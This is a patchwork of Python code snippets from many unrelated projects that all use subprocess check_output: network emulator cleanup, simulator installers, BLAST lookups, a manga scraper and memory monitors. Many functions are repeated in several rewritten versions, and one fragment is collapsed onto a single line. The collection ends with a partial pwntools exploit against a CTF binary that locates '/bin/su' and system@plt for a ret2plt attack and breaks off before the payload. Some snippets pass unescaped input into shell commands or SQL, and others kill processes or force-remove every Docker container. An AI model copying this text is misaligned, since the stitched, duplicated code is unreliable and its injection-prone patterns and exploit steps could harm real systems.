def downloadChapter(imageURLs):
    """Download every image URL in *imageURLs* into the current directory.

    Each failure is reported and skipped so one bad link does not abort
    the rest of the chapter download.
    """
    for line in imageURLs:
        try:
            # Pass curl an argument list (no shell) so URLs containing
            # shell metacharacters cannot inject commands; -O -J keeps
            # the server-suggested filename as before.
            co(["curl", "-O", "-J", line])
        except Exception as e:
            # Py3-compatible exception syntax (was `except Exception, e`).
            print(str(e))
def kill_mod_proc(cls):
    """Tear down helper processes, wireless kernel modules and the TCP
    socket port left over from a previous emulation run."""
    if cls.plot:
        cls.plot.closePlot()
    cls.killprocs('sumo-gui')
    cls.killprocs('hostapd')
    sleep(0.1)
    cls.sh('pkill babel')
    cls.sh('pkill wmediumd')
    sleep(0.1)
    info("\n*** Removing WiFi module and Configurations\n")
    # grep exits non-zero (CalledProcessError) when the module is not
    # loaded; the bare except then skips the rmmod for that module.
    try:
        co("lsmod | grep mac80211_hwsim", shell=True)
        os.system('rmmod mac80211_hwsim >/dev/null 2>&1')
    except:
        pass
    try:
        co("lsmod | grep ifb", shell=True)
        os.system('rmmod ifb')
    except:
        pass
    # Best-effort: wpa_supplicant may not be running at all.
    try:
        os.system('pkill -f \'wpa_supplicant -B -Dnl80211\'')
    except:
        pass
    if cls.socket_port:
        info('\n*** Done\n')
        # Free the TCP port held by the previous run's socket server.
        cls.sh('fuser -k %s/tcp >/dev/null 2>&1' % cls.socket_port)
def install_nml2():
    """Clone the NeuroML2 repository and switch to its development branch."""
    with working_dir(install_root):
        # print() with a single argument is valid on Python 2 and 3
        # (was a Py2-only print statement).
        print(co(['git', 'clone', 'https://github.com/NeuroML/NeuroML2.git']))
    with working_dir(default_nml2_dir):
        print(co(['git', 'checkout', 'development']))
    inform('Successfully cloned NeuroML2', indent=2, verbosity=1)
def install_nml2():
    """Fetch the NeuroML2 sources and check out their 'development' branch."""
    clone_cmd = ['git', 'clone', 'https://github.com/NeuroML/NeuroML2.git']
    with working_dir(install_root):
        print(co(clone_cmd))
    checkout_cmd = ['git', 'checkout', 'development']
    with working_dir(default_nml2_dir):
        print(co(checkout_cmd))
    inform('Successfully cloned NeuroML2', indent=2, verbosity=1)
def install_jnml():
    """Check out the jNeuroML jar tree from SourceForge SVN into ~/jnml."""
    jnmlpath = os.path.join(os.environ['HOME'], 'jnml')
    os.mkdir(jnmlpath)
    with working_dir(jnmlpath):
        # print() form works on Python 2 and 3 (was a Py2 print statement).
        print(co([
            'svn', 'checkout',
            'svn://svn.code.sf.net/p/neuroml/code/jNeuroMLJar'
        ]))
def cleanup_6lowpan(cls):
    """Clean up junk which might be left over from old runs; do fast
    stuff before slow dp and link removal!"""
    try:
        info("*** Removing fakelb module and Configurations\n")
        # grep exits non-zero (CalledProcessError) when fakelb is not
        # loaded, which skips the rmmod below.
        co("lsmod | grep fakelb", shell=True)
        os.system('rmmod fakelb')
    except:
        # Best-effort cleanup: module absent or rmmod failed.
        pass
def cleanup_mac802154(cls):
    """Clean up junk which might be left over from old runs; do fast
    stuff before slow dp and link removal!"""
    try:
        info("*** Removing mac802154_hwsim module and Configurations\n")
        # grep exits non-zero (CalledProcessError) when the module is not
        # loaded, which skips the rmmod below.
        co("lsmod | grep mac802154_hwsim", shell=True)
        os.system('rmmod mac802154_hwsim')
    except:
        # Best-effort cleanup: module absent or rmmod failed.
        pass
def cleanup_docker_containers(self):
    """Stop, then force-remove, every Docker container on this host."""
    # 'docker ps' always prints a header line, so > 1 means at least
    # one container is listed.
    running = co("docker ps | wc -l", shell=True)
    if int(running) > 1:
        run("docker stop $(docker ps -a -q)", shell=True)
    remaining = co("docker ps -a | wc -l", shell=True)
    if int(remaining) > 1:
        run("docker rm -f $(docker ps -a -q)", shell=True)
def peptitle(accession, db='RPHs'):
    """Fetch the sequence title(s) ("%t") for *accession* from BLAST db *db*.

    A collection of accessions yields a list of titles (one per line);
    a single accession yields one string.  Returns None when blastdbcmd
    exits with an error.
    """
    cmd = ['blastdbcmd', '-db', db, '-dbtype', 'prot',
           '-entry', accession, '-outfmt', "%t"]
    try:
        if type(accession) in [list, tuple, set]:
            return co(cmd).strip().split('\n')
        return co(cmd).strip()
    except CalledProcessError:
        return None
def peptitle(accession, db='RPHs'):
    """Look up the title ("%t") of one or more protein accessions in *db*.

    Returns a list for collection inputs, a string otherwise, or None on
    a blastdbcmd failure.
    """
    args = ['blastdbcmd', '-db', db, '-dbtype', 'prot',
            '-entry', accession, '-outfmt', "%t"]
    try:
        text = co(args).strip()
    except CalledProcessError:
        return None
    # Multiple accessions come back as one title per line.
    if type(accession) in [list, tuple, set]:
        return text.split('\n')
    return text
def install_genesis(get_latest=False):
    """Download, build and configure GENESIS 2.4gamma under ~/genesis.

    *get_latest* is accepted for interface compatibility but is unused here.
    """
    genpath = os.path.join(os.environ['HOME'], 'genesis')
    os.mkdir(genpath)
    with working_dir(genpath):
        # print() form is valid on Python 2 and 3 (was Py2 print statements).
        print(co(['wget', 'https://github.com/borismarin/genesis2.4gamma/archive/master.zip']))
        print(co(['unzip', 'master.zip']))
        print(co(['ls', '-la', 'genesis2.4gamma-master']))
        os.chdir('genesis2.4gamma-master/src')
        print(co(['./configure']))
        print(co(['make']))
    # Write the simulator rc file; 'with' closes the handle reliably
    # (the original left the file object unclosed).
    with open(os.path.join(os.environ['HOME'], '.simrc'), 'w') as f:
        f.write(simrc)
def pepfetch(accession, db='RPHs'):
    """Return raw sequence text ("%s") for *accession* from BLAST db *db*.

    Collections are joined into a single comma-separated -entry value and
    the multi-record output is split into a list; single accessions return
    the raw output string.  Returns None when blastdbcmd fails.
    """
    base = ['blastdbcmd', '-db', db, '-dbtype', 'prot']
    tail = ['-outfmt', "%s"]
    try:
        if type(accession) in [list, tuple, set]:
            return co(base + ['-entry', tocsl(accession)] + tail).split()
        return co(base + ['-entry', accession] + tail)
    except CalledProcessError:
        return None
def install_jlems():
    """Clone jLEMS under $HOME and install it with maven."""
    install_root = os.environ['HOME']
    with working_dir(install_root):
        # print() form works on Python 2 and 3 (was a Py2 print statement).
        print(co(['git', 'clone', 'https://github.com/LEMS/jLEMS.git']))
    inform('Successfully cloned jLEMS', indent=2, verbosity=1)
    path = os.path.join(install_root, 'jLEMS')
    with working_dir(path):
        print(co(['mvn', 'install']))
    inform('Successfully installed jLEMS', indent=2, verbosity=1)
def install_jlems():
    """Fetch jLEMS from GitHub into $HOME and run its maven install."""
    install_root = os.environ['HOME']
    with working_dir(install_root):
        # Parenthesized print is valid under both Python 2 and 3
        # (was a Py2-only print statement).
        print(co(['git', 'clone', 'https://github.com/LEMS/jLEMS.git']))
    inform('Successfully cloned jLEMS', indent=2, verbosity=1)
    path = os.path.join(install_root, 'jLEMS')
    with working_dir(path):
        print(co(['mvn', 'install']))
    inform('Successfully installed jLEMS', indent=2, verbosity=1)
def install_genesis(get_latest=False):
    """Download, unpack, build and configure GENESIS 2.4gamma in ~/genesis.

    *get_latest* is accepted for interface compatibility but is unused here.
    """
    genpath = os.path.join(os.environ['HOME'], 'genesis')
    os.mkdir(genpath)
    with working_dir(genpath):
        # print() form works on Python 2 and 3 (was Py2 print statements).
        print(co([
            'wget',
            'https://github.com/borismarin/genesis2.4gamma/archive/master.zip'
        ]))
        print(co(['unzip', 'master.zip']))
        print(co(['ls', '-la', 'genesis2.4gamma-master']))
        os.chdir('genesis2.4gamma-master/src')
        print(co(['./configure']))
        print(co(['make']))
    # Use 'with' so the rc file is closed even on a write error
    # (the original handle was never closed explicitly).
    with open(os.path.join(os.environ['HOME'], '.simrc'), 'w') as f:
        f.write(simrc)
def check_phone():
    """Return True if PHONE_IP answers a single ping, False otherwise."""
    try:
        # Output is irrelevant; co() raising CalledProcessError (grep
        # found no 'bytes from' reply) is the failure signal, so the
        # unused locals `s` and `e` were removed.
        co("ping -c 1 " + PHONE_IP + " | grep 'bytes from'", shell=True)
    except subprocess.CalledProcessError:
        return False
    # Short pause so repeated polls do not hammer the network.
    sleep(0.5)
    return True
def process_info(info, site):
    """Populate info['an'] (git author name) and info['at'] (authored
    date) from the last git commit touching info['fn']; MEP-layout pages
    are validated first.  (*site* is unused in the visible body.)"""
    if info['layout'] == 'mep':
        validate_mep(info)
    # site developers should have git
    an = co(["git", "log", "-1", "--format='%an'", info['fn']])
    # decode to convert to unicode for both Python 2 and 3
    an = an.decode('utf-8')
    # git's --format quoting leaves surrounding quotes/newline; strip them.
    an = an.strip("'\n")
    info['an'] = an
    at = co(["git", "log", "-1", "--format='%at'", info['fn']])
    # decode to convert to unicode for both Python 2 and 3
    at = at.decode('utf-8')
    at = at.strip("'\n")
    if at:
        # %at is a unix timestamp; store it as a date object.
        at = datetime.date.fromtimestamp(int(at))
        info['at'] = at
def append_old_to_new(gi2tax_map, newmap, concat_map, folder=FOLDER):
    """Map the GI of every .fna file under *folder* through *gi2tax_map*,
    write "name<TAB>taxid" rows to *concat_map*, then append *newmap*.

    Returns (concat_map, set of paths whose GI was found in the map).
    """
    paths = co("find %s -name '*.fna'" % folder, shell=True)
    # Python 3 check_output returns bytes; normalise to str.
    if isinstance(paths, bytes):
        paths = paths.decode()
    paths = paths.split()
    print("Length of accepted things: %i" % len(gi2tax_map))
    found, missing = set(), set()
    # 'with' guarantees the output file is closed even if a path raises
    # (the original open()/close() pair leaked on exceptions).
    with open(concat_map, "w") as ofh:
        ofw = ofh.write  # hoist the bound method for the hot loop
        for path in paths:
            sys.stderr.write("Processing path %s" % path)
            fl = xfirstline(path)
            # FASTA header fields are pipe-delimited: >gi|<gi>|...|<name>|
            ptoks = fl.split("|")
            name = ptoks[3]
            key = int(ptoks[1])
            try:
                val = gi2tax_map[key]
                ofw("%s\t%i\n" % (name, val))
                found.add(path)
            except KeyError:
                missing.add(int(fl.split("|")[1]))
    print("Missing: " + str(missing))
    # Append the new-refseq map onto the concatenated output.
    cc("cat %s >> %s" % (newmap, concat_map), shell=True)
    return concat_map, found
def calc_screen_light_mean_color():
    """Screenshot the screen (scrot 3% thumbnail), k-means the pixels into
    3 clusters and return the mean RGB of the dominant cluster as a
    generator of ints (r, g, b)."""
    # scrot -t 3% writes the full shot plus a 3%-scale thumbnail.
    co("scrot -t 3% /tmp/real_test.png", shell=True)
    red = np.asarray(imread("/tmp/real_test-thumb.png"))
    print(red, red.shape)
    original_shape = red.shape  # so we can reshape the labels later
    W = red.shape[0]
    H = red.shape[1]
    # Flatten to one row per pixel for clustering.
    # NOTE(review): assumes a 3-channel image — an RGBA thumbnail would
    # break this reshape; confirm scrot's output format.
    red = red.flatten().reshape(W * H, 3)
    print(red, red.shape)
    samples = red
    clf = sklearn.cluster.KMeans(n_clusters=3)
    labels = clf.fit_predict(samples).flatten().reshape(W, H)
    print(labels.shape)
    print(labels)
    # import matplotlib.pyplot as plt
    # plt.imshow(labels)
    # plt.show()
    red = red.flatten().reshape(W, H, 3)
    # plt.imshow(red)
    # plt.show()
    # Per-cluster mean colour.
    mean_color = [0] * 3
    for i in range(3):
        print("red:", red[labels == i])
        mean_color[i] = np.mean(red[labels == i], axis=(0))
    print("mean_color:", mean_color)
    # NOTE(review): light_mean is assigned twice — the brightness-based
    # pick below is immediately overwritten by the largest-cluster pick,
    # so only the second assignment takes effect.
    mean_avg_arr = [sum(x) / 3 for x in mean_color]
    light_mean = mean_color[mean_avg_arr.index(max(mean_avg_arr))]
    max_elems_arr = [len(red[labels == x]) for x in range(3)]
    light_mean = mean_color[max_elems_arr.index(max(max_elems_arr))]
    print("light_mean:", light_mean)
    # Recolour every pixel with its cluster mean (local array only; kept
    # for the commented-out preview below).
    for i in range(W):
        for j in range(H):
            red[i, j] = mean_color[labels[i, j]]
    # plt.imshow(red)
    # plt.show()
    return (int(x) for x in light_mean)
def send(x, y, color):
    """Issue the paint command for pixel (x, y) with *color* and print
    whether the server reported success."""
    run = src % (x, y, color)
    ans = co(run, shell=True)
    try:
        # Parenthesized single-argument print works on Python 2 and 3
        # (was a Py2-only print statement).
        print("%s paint at (%3d,%3d) with %d" % ("Succ" if parse(ans)["flag"] else "Fail", x, y, color))
    except:
        # parse() may fail on unexpected responses; best-effort report.
        print("ERROR")
def install_neuron(version):
    """Download, build and install NEURON *version* (default '7.6') into
    ~/neuron, then install its Python bindings."""
    if not version:
        version = '7.6'
    nrnpath = os.path.join(os.environ['HOME'], 'neuron')
    inform('Installing NEURON %s into %s' % (version, nrnpath), indent=1)
    os.mkdir(nrnpath)
    with working_dir(nrnpath):
        tarball = 'nrn-%s.tar.gz' % version
        print(co(['wget',
                  'https://www.neuron.yale.edu/ftp/neuron/versions/v%s/nrn-%s.tar.gz' % (version, version)]))
        print(co(['tar', 'xzvf', tarball]))
        print(co(['mv', 'nrn-%s' % version, 'nrn']))
        os.chdir('nrn')
        path = os.getcwd()
        pyexec = sys.executable
        # configure takes its flags embedded in one string, hence shell=True.
        co(["./configure --prefix=%s --without-iv --with-nrnpython=%s" % (path, pyexec)], shell=True)
        print(co(['make', '-j4']))
        print(co(['make', 'install']))
        os.chdir('src/nrnpython')
        run_setup('./setup.py', ['install'])
def cleanup_wifi(cls):
    """Clean up junk which might be left over from old runs; do fast
    stuff before slow dp and link removal!"""
    info("*** Removing WiFi module and Configurations\n")
    # grep exits non-zero when the module is absent, so the bare except
    # skips the rmmod for modules that were never loaded.
    try:
        co("lsmod | grep mac80211_hwsim", shell=True)
        os.system('rmmod mac80211_hwsim')
    except:
        pass
    try:
        co("lsmod | grep ifb", shell=True)
        os.system('rmmod ifb')
    except:
        pass
    killprocs('hostapd')
    # Remove per-run telemetry/config files, if any were generated.
    if glob.glob('*-mn-telemetry.txt'):
        os.system('rm *-mn-telemetry.txt')
    if glob.glob('*.apconf'):
        os.system('rm *.apconf')
    if glob.glob('*.staconf'):
        os.system('rm *.staconf')
    if glob.glob('*wifiDirect.conf'):
        os.system('rm *wifiDirect.conf')
    if glob.glob('*.nodeParams'):
        os.system('rm *.nodeParams')
    # Best-effort teardown of the wpa_supplicant and babeld daemons.
    try:
        os.system('pkill -f \'wpa_supplicant -B -Dnl80211\'')
    except:
        pass
    try:
        os.system('pkill -f \'babeld\'')
    except:
        pass
    info("*** Killing wmediumd\n")
    sh('pkill wmediumd')
    sixlowpan.cleanup_6lowpan()
def peplen(accession, db='RPHs'):
    """Return the sequence length ("%l") of protein accession(s) in *db*.

    Returns an int for a single accession, a list of ints for a
    collection, or None for a None input or a blastdbcmd failure.
    """
    try:
        if accession is None:
            return None
        if type(accession) in [list, tuple, set]:
            out = list()
            for acc in accession:
                # BUGFIX: query each accession individually — the original
                # passed the whole collection (tocsl(accession)) on every
                # iteration instead of the loop variable, so int() was fed
                # multi-line output.
                out.append(int(co(['blastdbcmd', '-db', db, '-dbtype', 'prot',
                                   '-entry', acc, '-outfmt', "%l"]).strip()))
        else:
            out = int(co(['blastdbcmd', '-db', db, '-dbtype', 'prot',
                          '-entry', accession, '-outfmt', "%l"]).strip())
        return out
    except CalledProcessError:
        return None
def peplen(accession, db='RPHs'):
    """Return the sequence length ("%l") of protein accession(s) in *db*.

    An int for a single accession, a list of ints for a collection,
    None for a None input or when blastdbcmd fails.
    """
    try:
        if accession is None:
            return None
        if type(accession) in [list, tuple, set]:
            out = list()
            for acc in accession:
                # BUGFIX: use the loop variable; the original queried the
                # whole collection (tocsl(accession)) on each pass.
                out.append(int(co(['blastdbcmd', '-db', db, '-dbtype', 'prot',
                                   '-entry', acc, '-outfmt', "%l"]).strip()))
        else:
            out = int(co(['blastdbcmd', '-db', db, '-dbtype', 'prot',
                          '-entry', accession, '-outfmt', "%l"]).strip())
        return out
    except CalledProcessError:
        return None
def getChapterImages(url):
    """Scrape the lstImages.push("...") image URLs from a kissmanga
    chapter page; returns the list of URLs (empty on any failure)."""
    imageURLsReturn = []
    try:
        response = co("curl \"" + url + "\"", shell=True)
        responseDataSplit = response.split('\n')
        for line in responseDataSplit:
            imageURL = re.findall("\s+lstImages.push\(\"(.+)\"\);", line)
            if len(imageURL) > 0:
                imageURLsReturn.append(imageURL[0])
    except Exception as e:
        # Py3-compatible except syntax (was `except Exception, e`).
        print(str(e))
    # BUGFIX: the original built this list but never returned it.
    return imageURLsReturn
def cleanup_wifi(cls):
    """Clean up junk which might be left over from old runs; do fast
    stuff before slow dp and link removal!"""
    info("*** Removing WiFi module and Configurations\n")
    # grep exits non-zero when the module is absent; the bare except then
    # skips the rmmod for modules that were never loaded.
    try:
        co("lsmod | grep mac80211_hwsim", shell=True)
        os.system('rmmod mac80211_hwsim')
    except:
        pass
    try:
        co("lsmod | grep ifb", shell=True)
        os.system('rmmod ifb')
    except:
        pass
    killprocs('hostapd')
    # Remove per-run generated config files, if any.
    if glob.glob("*.apconf"):
        os.system('rm *.apconf')
    if glob.glob("*.staconf"):
        os.system('rm *.staconf')
    if glob.glob("*wifiDirect.conf"):
        os.system('rm *wifiDirect.conf')
    if glob.glob("*.nodeParams"):
        os.system('rm *.nodeParams')
    # Best-effort teardown of wpa_supplicant.
    try:
        os.system('pkill -f \'wpa_supplicant -B -Dnl80211\'')
    except:
        pass
    info("*** Killing wmediumd\n")
    sh('pkill wmediumd')
    sixlowpan.cleanup_6lowpan()
def pepfasta(accession, db='RPHs', asTuple=False):
    """Fetch the FASTA record ("%f") for a single *accession* from *db*.

    With asTuple=True, returns (defline, concatenated_sequence); otherwise
    the raw FASTA text.  Returns None when blastdbcmd fails.
    """
    # this one is NOT ok with lists
    cmd = ['blastdbcmd', '-db', db, '-dbtype', 'prot',
           '-entry', accession, '-outfmt', "%f"]
    try:
        if asTuple:
            lines = list(co(cmd).strip().split('\n'))
            defline = lines[0]
            seq = ""
            for line in lines[1:len(lines)]:
                seq += line.strip()
            return (defline, seq)
        return co(cmd)
    except CalledProcessError:
        return None
def pepfasta(accession, db='RPHs', asTuple=False):
    """Retrieve the FASTA record ("%f") for one protein *accession*.

    asTuple=True splits it into (defline, sequence-with-newlines-removed);
    otherwise the raw blastdbcmd output is returned.  None on failure.
    """
    # this one is NOT ok with lists
    query = ['blastdbcmd', '-db', db, '-dbtype', 'prot',
             '-entry', accession, '-outfmt', "%f"]
    try:
        if asTuple:
            record = co(query).strip().split('\n')
            defline = record[0]
            # Join the wrapped sequence lines into one string.
            seq = "".join(part.strip() for part in record[1:])
            return (defline, seq)
        return co(query)
    except CalledProcessError:
        return None
def killprocs(pattern):
    "Reliably terminate processes matching a pattern (including args)"
    sh('pkill -9 -f %s' % pattern)
    # Re-check with pgrep and keep killing until no matches remain.
    while True:
        try:
            survivors = co(['pgrep', '-f', pattern])
        except CalledProcessError:
            survivors = ''
        if not survivors:
            break
        sh('pkill -9 -f %s' % pattern)
        time.sleep(.5)
def killprocs( pattern ):
    "Reliably terminate processes matching a pattern (including args)"
    kill_cmd = 'pkill -9 -f %s' % pattern
    sh( kill_cmd )
    # Loop until pgrep reports no remaining matches.
    still_running = True
    while still_running:
        try:
            pids = co( [ 'pgrep', '-f', pattern ] )
        except CalledProcessError:
            pids = ''
        still_running = bool( pids )
        if still_running:
            sh( kill_cmd )
            time.sleep( .5 )
def killprocs( pattern ):
    "Reliably terminate processes matching a pattern (including args)"
    sh( 'pkill -9 -f %s' % pattern )
    # Make sure they are gone
    while True:
        try:
            # BUGFIX: check_output with a plain string and shell=False
            # treats the whole string as one program name and always
            # failed; split it into an argument list.
            pids = co( ( 'pgrep -f %s' % pattern ).split() )
        except:
            pids = ''
        if pids:
            # BUGFIX: flags were transposed ('pkill -f 9 mininet:'), which
            # matched pattern '9' and never killed the target processes;
            # re-kill the processes matching *pattern* instead.
            sh( 'pkill -9 -f %s' % pattern )
            sleep( .5 )
        else:
            break
def killprocs(pattern):
    "Reliably terminate processes matching a pattern (including args)"
    sh('pkill -9 -f %s' % pattern)
    # Make sure they are gone
    while True:
        try:
            # BUGFIX: a plain string with shell=False is treated as a
            # single program name and always raised; use an arg list.
            pids = co(('pgrep -f %s' % pattern).split())
        except:
            pids = ''
        if pids:
            # BUGFIX: transposed flags ('pkill -f 9 mininet:') matched
            # pattern '9'; kill the processes matching *pattern* instead.
            sh('pkill -9 -f %s' % pattern)
            time.sleep(.5)
        else:
            break
def killprocs(pattern):
    "Reliably terminate processes matching a pattern (including args)"
    sh("pkill -9 -f %s" % pattern)
    # Poll pgrep and re-kill until nothing matching the pattern remains.
    while True:
        try:
            remaining = co(["pgrep", "-f", pattern])
        except CalledProcessError:
            remaining = ""
        if not remaining:
            break
        sh("pkill -9 -f %s" % pattern)
        time.sleep(0.5)
def install_neuron(get_latest=False):
    """Build and install NEURON (7.4 release, or the git HEAD when
    *get_latest* is True) into ~/neuron, then install the python2
    bindings."""
    nrnpath = os.path.join(os.environ['HOME'], 'neuron')
    inform('Installing NEURON into %s' % nrnpath, indent=1)
    os.mkdir(nrnpath)
    with working_dir(nrnpath):
        if get_latest:
            print(co(['git', 'clone', 'https://github.com/neuronsimulator/nrn']))
            os.chdir('nrn')
            # build.sh generates the autotools configure script.
            print(co(['./build.sh']))
        else:
            for step in (['wget', 'https://www.neuron.yale.edu/ftp/neuron/versions/v7.4/nrn-7.4.tar.gz'],
                         ['tar', 'xzvf', 'nrn-7.4.tar.gz'],
                         ['mv', 'nrn-7.4', 'nrn']):
                print(co(step))
            os.chdir('nrn')
        path = os.getcwd()
        pyexec = 'python2'  # sys.executable
        # One shell string because all flags live in a single argument.
        co(["./configure --prefix=%s --without-iv --without-paranrn --with-nrnpython=%s" % (path, pyexec)], shell=True)
        print(co(['make']))
        print(co(['make', 'install']))
        os.chdir('src/nrnpython')
        run_setup('./setup.py', ['install'])
def check(pname):
    """Sample memory usage once a second while any *pname* process is
    alive, then kill the collectl logger and dump samples to memN.log."""
    time_x = []
    mem_used = []
    start = time.time()
    mem_info = os.popen('free -h').read().split()
    mem_all = mem_info[7][:-1]
    # Hoisted loop-invariant command; the original also ran it once
    # before the loop and discarded the result (dead shell spawn removed).
    ps_cmd = 'ps ax | grep ' + pname + ' | grep -v grep | grep -v python'
    while True:
        time_x.append(time.time() - start)
        mem_used.append(get_mem_used())
        # Stop sampling once the monitored process disappears.
        result = os.popen(ps_cmd).read().split()
        if not len(result):
            break
        time.sleep(1)
    # Kill the collectl logger that was started alongside the benchmark.
    os.system('kill ' + co('ps -ax | grep "/usr/bin/collectl" | grep -v grep | grep -v python', shell=True).decode().lstrip().split(' ')[0])
    with open("mem" + os.getenv("HOSTNAME")[-1] + ".log", "w") as f:
        for i in range(len(mem_used)):
            f.write(str(mem_all) + ", " + str(time_x[i]) + ", " + str(mem_used[i]) + "\n")
def getpid(name=TEST_PNAME):
    """Return (pid, '') for the first process named *name* per `ps -fC`,
    or (None, message) when ps finds no such process."""
    try:
        listing = co(['ps', '-fC', name]).decode()
        rows = listing.split('\n')
        del rows[0]  # drop the ps header line
        for row in rows:
            # Collapse runs of spaces into discrete fields.
            fields = [tok for tok in row.split(' ') if tok != '']
            if fields != []:
                user, pid, ppid, c, stime, tty, time = fields[:7]
                cmd = ' '.join(fields[7:])
                return int(pid), ''
    except CalledProcessError as e:
        return None, f'{name!r} nicht gefunden'
def getMangaInfo(url):
    """Scrape a kissmanga manga page for its title and chapter links.

    Returns the list of {"url": ..., "name": ...} chapter dicts
    (empty on any failure).
    """
    chapterURLsReturn = []
    mangaTitle = "gg"
    try:
        response = co("curl \"" + url + "\"", shell=True)
        responseDataSplit = response.split('\n')
        for line in responseDataSplit:
            mangaTitles = re.findall("<a Class=\"bigChar\" href=\"(.+)\">(.+)</a>", line)
            if len(mangaTitles) > 0:
                mangaTitle = mangaTitles[0][1]
            chapterURL = re.findall("<a href=\"(.+)\" title=\"Read (.+) online\">", line)
            if len(chapterURL) > 0:
                chapterURLsReturn.append({"url": "http://kissmanga.com" + str(chapterURL[0][0]),
                                          "name": str(chapterURL[0][1])})
    except Exception as e:
        # Py3-compatible except syntax (was `except Exception, e`).
        print(str(e))
    # BUGFIX: the original collected the chapter list but fell off the end
    # without returning it; the unused chapterURLs local was dropped too.
    return chapterURLsReturn
def main():
    """Drive the refseq/taxonomy pipeline: optionally download genomes,
    build the acceptable-taxid map, merge the old and new name→taxid
    maps, dedupe the merged file, and record which paths were found."""
    args = getopts()
    gi2tax = get_gi2tax(args.folder)
    if args.no_download is False:
        fetch_genomes(args.folder)
    print("Getting acceptable taxids")
    taxmap = build_full_taxmap(args.taxonomy)
    acceptable_taxids = get_acceptable_taxids(taxmap)
    print("Appending old to new")
    concat, found = append_old_to_new(parse_gi2tax(gi2tax, acceptable_taxids),
                                      args.new_refseq_nameid_map,
                                      args.combined_nameid_map,
                                      args.folder)
    # Sort + uniq the merged map in place via a temporary file.
    cc("sort {0} | uniq > tmp.zomg && mv tmp.zomg {0}".format(concat), shell=True)
    # Final line count, for the progress message below.
    nl = int(co("wc -l %s" % concat, shell=True).decode().split()[0])
    sys.stderr.write("Concatenated file of total lines "
                     "%i is written to %s.\n" % (nl, concat))
    with open(args.found if args.found else "found_paths.txt", "w") as f:
        for path in found:
            f.write(path + "\n")
    return 0
def check(pname):
    """Sample memory use once a second while any *pname* process is
    alive, then kill collectl and dump the samples to memN.log."""
    time_x = []
    mem_used = []
    start = time.time()
    mem_info = os.popen('free -h').read().split()
    mem_all = mem_info[7][:-1]
    # NOTE(review): this pre-loop result is overwritten before use.
    result = os.popen('ps ax | grep ' + pname + ' | grep -v grep | grep -v python').read().split()
    while True:
        time_x.append(time.time() - start)
        mem_used.append(get_mem_used())
        # Stop sampling once the monitored process disappears.
        result = os.popen('ps ax | grep ' + pname + ' | grep -v grep | grep -v python').read().split()
        if not len(result):
            break
        time.sleep(1)
    # Kill the collectl logger started alongside the benchmark.
    os.system('kill ' + co('ps -ax | grep "/usr/bin/collectl" | grep -v grep | grep -v python', shell=True).decode().lstrip().split(' ')[0])
    with open("mem" + os.getenv("HOSTNAME")[-1] + ".log", "w") as f:
        for i in range(len(mem_used)):
            f.write(str(mem_all) + ", " + str(time_x[i]) + ", " + str(mem_used[i]) + "\n")

if __name__ == '__main__':
    res = ''
    # Monitor the benchmark process in the background while collectl runs.
    Process(target=check, args=('benchmark_parconnect',)).start()
    try:
        res = co('collectl -sx', shell=True).decode()
    except Exception:
        pass
    print(res)
    with open("infiniband" + os.getenv("HOSTNAME")[-1] + ".log", "w") as f:
        f.write(res)
#!/usr/bin/python

from subprocess import check_output as co
from sys import exit

# Actually run bin/mn rather than importing via python path
version = 'Mininet ' + co( 'PYTHONPATH=. bin/mn --version', shell=True )
version = version.strip()

# Find all Mininet path references
lines = co( "grep -or 'Mininet \w\+\.\w\+\.\w\+[+]*' *", shell=True )

error = False

for line in lines.split( '\n' ):
    if line and 'Binary' not in line:
        # Each grep hit looks like "<file>:Mininet x.y.z".
        fname, fversion = line.split( ':' )
        if version != fversion:
            # print() with one argument works on Python 2 and 3
            # (was a Py2-only print statement).
            print( "%s: incorrect version '%s' (should be '%s')" % (
                fname, fversion, version ) )
            error = True

if error:
    exit( 1 )
def filter_call(cstr, fp):
    """Run *cstr* through bash (stderr redirected to *fp*) and return
    every output line whose lowercased text contains "error"."""
    output = co(cstr, shell=True, stderr=fp, executable="/bin/bash").decode()
    matches = []
    for line in output.split('\n'):
        if "error" in line.lower():
            matches.append(line)
    return matches
group.add_argument('--public', action='store_const', const=True)
group.add_argument('--private', action='store_const', const=False)
parser.add_argument('user_id', help='user id of new owner', type=int)
args = parser.parse_args()

# Folder id 0 / name 'root' are reserved: refuse to re-own the root folder.
if args.folder_id is not None and args.folder_id == 0:
    print('not valid for root')
    sys.exit(1)
if args.folder_name is not None and args.folder_name == 'root':
    print('not valid for root')
    sys.exit(1)

# Verify the target user exists before doing anything else.
sql = "copy (select * from users where id='%s') to stdout csv" % args.user_id
cmd = ['sudo', '-u', 'postgres', 'psql', '-d', 'hoot', '-c', sql]
stdout = co(cmd, stderr=devnull)
if len(stdout) == 0:
    # print() with one argument works on Python 2 and 3
    # (was a Py2-only print statement).
    print('user %s not found' % args.user_id)
    sys.exit(1)

if args.folder_name is not None:
    # A display_name shared by several folders is ambiguous; bail out.
    sql = "copy (select count(1) from folders where display_name = '%s') to stdout csv" % args.folder_name
    cmd = ['sudo', '-u', 'postgres', 'psql', '-d', 'hoot', '-c', sql]
    stdout = co(cmd, stderr=devnull)
    rows = stdout.split('\n')
    row = rows[0]
    count = int(row)
    if count > 1:
        print('folder name collides, cannot continue w/ display_name')
        sys.exit(1)
raw_url = github_repo.link_to_raw_file_in_repo(".travis.yml") print(" .travis.yml found at %s\n" % raw_url) contents = osb.utils.get_page(raw_url) if 'omv' not in contents: print("That .travis.yml does not look like it uses OMV...") non_omv_tests += 1 else: testable_projects += 1 test_it = True else: print(" (No .travis.yml)") if test_it: target_dir = '%s/%s' % (test_dir, proj_id) print co(['git', 'clone', str(github_repo.clone_url), target_dir]) with working_dir(target_dir): if proj_id in branches.keys(): print co(['git', 'checkout', branches[proj_id]]) print "Running 'omv all' on", target_dir test_all() passing_projects += 1 print("\nSo far: %i projects with OMV tests which pass\n" % (passing_projects)) end = datetime.datetime.now() print( "\n%i projects checked, of which %i have OMV tests (%i non-OMV tested projects) and %i passed with OMV in %s seconds\n"
from pwn import *
from subprocess import check_output as co

# Exploit for ./kudanil_lsi: dump the in-game map, solve it with the
# external map.solution helper, then overflow into a ret2plt call of
# system('/bin/su').
p = process("./kudanil_lsi")
p.sendline("")
e = ELF('./kudanil_lsi')
binsu = next(e.search('/bin/su'))
system_plt = e.plt['system']
# Capture the last 11 lines of output before the "su" prompt — the map.
s = p.recvuntil("su")
s = s.split("\n")[-11:]
s = "\n".join(s)
print s
f = open('map', 'w')
f.write(s)
f.close()
# External solver turns the dumped map into the input move sequence.
solution = co('cat map | ./map.solution', shell=True)
for c in range(0, len(solution)):
    p.sendline(solution[c])
